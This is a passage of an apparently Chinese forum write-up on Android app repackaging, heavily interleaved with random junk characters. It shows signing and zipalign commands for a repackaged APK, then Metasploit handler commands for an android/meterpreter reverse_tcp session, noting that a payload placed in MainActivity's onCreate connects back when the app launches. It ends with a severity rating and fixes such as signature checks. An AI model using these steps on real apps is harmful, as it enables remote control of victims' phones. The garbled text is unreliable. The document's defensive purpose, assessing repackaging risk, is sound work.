% Q$ d' R& N ]4 w- P4 T ) Q: }; I& F1 }& h keytool -printcert -jarfile repackaged.apk 4 M! R4 ~3 K9 h- n: l 4 m' Q! I5 y ?# A% B& `9 e( o3 G

) Z. _! j- q- x" u5 R' l - V" Z0 { _' t6 G4 _ 对齐 2 q$ P+ J& o8 n+ u+ M+ r 7 k; |8 l0 j8 c; l, [9 |6 A) s. S

& F4 T8 h, o; M0 e9 x: b2 } 0 m- H% s/ y. e/ N' F 字节对齐优化 . N* o2 o: V; t+ K. x2 G6 v. G' V/ e9 N8 d4 y: {1 a

$ y i; {, B# O$ p7 |) x" S2 T, P5 ^2 h2 r zipalign -v 4 repackaged.apk final.apk ; V6 G) I$ @" p' D) [. a, u ; M# n) a6 d/ M L

3 x# |& }# K4 Y6 _# X: ?3 N, P 0 P+ Y' Z; r8 K- m: d$ l 检查是否对齐 3 U3 ^+ @- I" b3 V0 N 9 k' O! N6 l+ Q$ ~# p- X

9 U. y3 U( h5 f) ~2 ` k 3 F! R, \4 o2 T4 K zipalign -c -v 4 final.apk % h3 p9 y" |1 D7 w: J2 B; C" `; i+ k+ Z' G

/ \& W5 b# h) o7 B& i% d8 [3 o. R- w8 B9 ]8 H 注：zipalign可以在V1签名后执行，但zipalign不能在V2签名后执行,只能在V2签名之前执行 6 z6 D+ P( w2 ^; K. S* Q1 S8 O4 B; M) K9 u! o

9 a. b* R! r& \- V/ r% f + S' @* c' L4 f9 H$ B! H 启动Metasploit控制台，配置参数等待上线 % f/ j. }1 @1 [: U( ] 2 G- y: W# L2 k/ G7 C

* L: U4 Z; g* @6 \) p ! _8 a! @; S# l5 @) V 在终端依次输入如下命令 4 ]# I8 }0 J. l5 ?1 G6 K$ o e0 m , ^; w; W7 v$ M- W; s B2 G

) D0 B0 y3 }- t: R7 i% I, L # R. R" I/ O) n$ {% { msfconsole 5 h+ u! S! i: _/ ^* U" P4 M# Y 2 _3 C- W1 X! f" v

0 [# v5 E+ Z6 M7 @. \: f! j, a % D. n+ A) c4 M1 w9 r& @2 D0 D use exploit/multi/handler % b7 ?/ i0 B; @& j ) F( m$ l4 w7 h/ M0 u

7 U" \4 F p8 e: [ 5 B+ d G& U2 `4 n9 q set PAYLOAD android/meterpreter/reverse_tcp " G$ K4 S" {9 R& ~) L P0 ^9 `! _8 u0 ?3 N' N& T7 E

; \6 A7 m. a7 a3 E' f' }) T . y9 M/ t- E- g0 y set LHOST 192.xxx.xx.xx 1 `0 w. n3 x1 V6 S8 [1 y+ d( Y# g- d: {) b* r3 t# Q3 [% K' ^

% M' R1 u; @) t# |4 f3 X9 A6 A 3 |3 W: b2 h A) x" t9 Z set LPORT 4444 8 ^ s) _$ U2 c- B. b ?' |+ _) K. H: \

. p) Q: i; m& O7 ]) ?5 D3 K/ u3 O1 ~ exploit % ]2 t9 T1 r( J2 T j8 w6 S6 ]/ l+ _3 m& [

9 j! Q+ P# K+ H, H U* _* J' t/ ^ & E9 R2 c" H! T1 h4 g" p a 之前我们把入口放在 MainActivity 的 onCreate 方法中，当启动目标应用进入该界面，就会连接成功，如下图： 4 `2 G# v/ d- p0 d$ `7 @* W5 z / G+ \$ `, k) P" Y

- A' C2 j; L. \0 V- y3 R% ?& c9 q: X! U; @' R 漏洞危害：中 ( s7 c$ S: m1 k1 Y+ ?* U- C : H% k1 C# O7 r( ]+ e7 |' O! E

. b a! \! ^. r) V0 Y5 K2 S% L2 e3 m$ n, w* D7 Y8 L * \|' N- b( _& u" U% `3 R$ j, d: H; l2 h1 N8 V3 p z" G8 C4 s 严重程度 ; g% _7 I0 f3 D9 j' T3 [$ a ]: B% B& O4 s " X$ _/ I& H1 v U# d# X # `7 `- \' {4 y5 p! B4 B	- z2 v A! M! j9 f% E% z- L! o P H2 G " R9 [' r4 }+ _) ?9 d4 v 4 w' g/ ^# X! r; Q: c 高 % i/ F' ]6 H1 Y 3 ?1 ]' a' X# ^! [, \5 w' }! }( s & e0 Y/ [6 J* W: n / D8 N% O% R' B3 S" C7 D	# P5 X* T& \ R+ b7 r / A8 W g' ^/ z* K4 A3 v; C! d $ f9 H3 n, S+ j% {% b 8 d( p5 [8 A9 ]; d( w. R ■ 1 p; a+ u0 C# T& w4 C3 T7 ?8 P : D8 X1 \* a% O4 Q [! V4 S- x' V7 ?/ S+ `	w% ?5 \, {2 a3 J$ w, T- v3 v$ A4 l2 n7 a0 J/ @, w( ^2 H 5 R8 N7 v0 d, j3 B$ R- t * V; W" u5 V& ]+ H 中 ( s8 U$ G# V, \|4 [! F& x ! X3 U* t8 F4 L) L* ? ) o5 w9 h% r& _' T! u0 Z+ u5 c' Q4 A - ~* e! g2 J" O4 X4 O2 \|9 s; Q	% V- ]4 K9 x: }* \|6 m' \|: q + Q# S* U; m( ?8 {1 J1 L% c& H ; o3 i1 J' f3 L( s& G + Y" h$ a& E# h$ `) ?- n # m9 i9 F% E% L# g P' E6 H& Q2 m( Y3 [( \ ; m8 E, q8 G; q: L' N: A 1 k# V" \|3 L# v# J / \2 s; s" o9 _& I: N % Q+ {8 i# K% L4 V	% \& Y1 _: C v+ }3 x : }2 ^# B) U+ r$ L o/ R5 r+ Q3 \% E ' W) \|: w6 e/ S0 M1 ^: J7 C + X/ F" V( E7 s# I& b7 v" T4 M 低 # I0 ~. ~6 c: X% N" j" X2 `3 w* K" _ Y6 x2 q# i9 e9 g % O x+ ~. L/ \|+ b, G" Q8 v1 w, I / C1 P) K- m9 \4 h0 k9 ?	6 U: M# z6 S8 M( {1 F- L+ Y! o# T7 s ) q. k5 F& K" T" P: Z 7 M/ ]4 B. @2 e5 {7 T; C/ ~$ Z, }% \4 n * h; y. e7 C% T. a+ I) k$ V & p/ L `: r* r3 W1 i / X9 A" J. P3 u' ~ # g: i% \|* _0 r 8 Q6 L1 j; V4 R$ W7 a* ^) j* @# D

5 A* B0 Q' @) E7 z( b0 f6 m- X! z# B0 p ( ?7 t- R# W3 N5 O, t) X , A* A ]8 q7 a2 X

% ?2 ]8 d2 B; V; l# B 4 {( Y5 e6 D& I0 b7 w 修复方法： + ^6 @. P9 `; L/ d2 Z. y5 p / K" E: j; D0 x8 w' M, l9 L

0 `, {0 e6 n/ R" p5 h: Q( N & o; K" K( n: U: {- _ 1.在 APP 启动时应做签名校验防止二次打包。
% Y( ~8 C c" ^' k. w5 z2 N4 Y& L) e) ^! T8 W# u 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 % p& P- e" ?' k ; h! {. B1 U1 l5 i- E: Q6 B

* |9 ]& P2 A$ D" L, p7 Y; M. ^1 c; J. F8 E' r) T ; L9 I6 l$ j% ~0 K/ c ) P+ n! b1 \) I

* t3 T* k: j1 ^4 }2 E1 v' W6 r. ]+ v+ a( n2 i
7 Y8 e5 H* i1 l- v, ~! h% J i 9 [" v1 [0 Q: y: e0 o% r3 `

		自动登录	找回密码
密码			立即注册